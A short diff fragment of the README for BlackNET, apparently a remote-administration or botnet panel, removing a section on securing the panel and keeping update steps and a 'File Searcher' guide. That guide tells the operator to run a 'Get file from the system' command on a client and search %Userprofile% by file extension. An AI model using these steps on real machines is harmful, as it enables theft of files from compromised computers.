FelixCMD/BlackNET/README.md

 3. Update the new config.php
 4. Run update.php

-## How to secure BlackNET
-1. Remove install.php and update.php
-2. Enable Captcha using Google reCaptcha v3
-3. Enable 2FA on your account
-4. Add a security question

 ## How to use the File Searcher Function
 1. execute "Get file fom the system" command on the client
 2. use this pattern ``` %Userprofile%|[Here write extension list] ```